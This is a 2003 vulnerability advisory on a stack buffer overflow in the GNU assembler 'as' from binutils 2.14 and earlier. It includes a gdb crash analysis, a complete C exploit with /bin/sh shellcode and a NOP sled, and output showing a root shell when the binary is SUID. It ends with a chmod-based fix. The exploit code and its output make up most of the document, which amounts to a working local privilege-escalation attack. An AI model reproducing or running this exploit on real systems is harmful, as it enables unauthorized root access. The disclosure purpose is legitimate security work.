Copy Link
Add to Bookmark
Report
01 - Stack Buffer Overflow on GNU (assembler) 2.14 and previous, for Linux
No System Group - Advisory #01 - 19/08/03
- Program: as - The GNU assembler
- Homepage: http://sources.redhat.com/binutils/
- Vulnerable Versions: GNU binutils 2.14 and prior
- Risk: Low / Medium
- Impact: Stack Buffer Overflow
DESCRIPTION
The GNU Binutils are a collection of binary tools.
'as' is the GNU assembler.
More informations at: http://sources.redhat.com/binutils/
DETAILS
$ /usr/bin/as `perl -e 'print "A" x 2005'`
Segmentation fault
Now we proceed to open gdb to view what may have occurred.
$gdb /usr/bin/as
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA...
..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
esp 0xbffff090 0xbffff090
(gdb)
Here as you can see we are able to gain the return address.
Return : 0xbffff090.
EXPLOIT
I have done minimal testing on this.
It has been tested on Slackware 9.0 and Red Hat 7.2
------------------- as_exp.c --------------------
/* Linux 'as' buffer overflow
This will give you a root shell if /usr/bin/as is SUID,
which isn't by default.
Use: ./as_exp [offset]
Try offsets 300-400
Tested on Slackware 9.0 and Red Hat 7.2
by CoKi <coki@interlap.com.ar>
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#define OFFSET 350
long esp(void);
int main(int argc, char *argv[]) {
char buf[2005];
char shellcode[]=
"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int i, off;
long ret;
if(argc>1) {
off = atoi(argv[1]);
}
else off = OFFSET;
ret = (esp() - off);
printf("\n'as' buffer overflow by CoKi\n");
printf("----------------------------\n\n");
printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);
for(i=0;i<2005;i+=4)
*(unsigned long *)&buf[i]=0x90909090;
*(unsigned long *)&buf[2005 - 4]=ret;
*(unsigned long *)&buf[2005 - 8]=ret;
memcpy(buf + 2005 - strlen(shellcode) - 8, shellcode, strlen(shellcode));
execlp("/usr/bin/as","as",buf,0);
}
long esp(void){
__asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------
$ gcc -o as_exp as_exp.c
$ ./as_exp 390
'as' buffer overflow by CoKi
----------------------------
Return Address: 0xbffff002
Offset: 390
Assembler messages:
Error: can't open ............
.................../bin/sh ..... for reading
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#
This will give you a root shell if /usr/bin/as is SUID, which isn't by default.
SOLUTIONS
Remove suid permissions on the program if it has them
#chmod u-s /usr/bin/as
REFERENCES
http://www.nosystem.com.ar/advisories/advisory-01.txt
CREDITS
Discovered by CoKi <coki@interlap.com.ar>
No System Group - http://www.nosystem.com.ar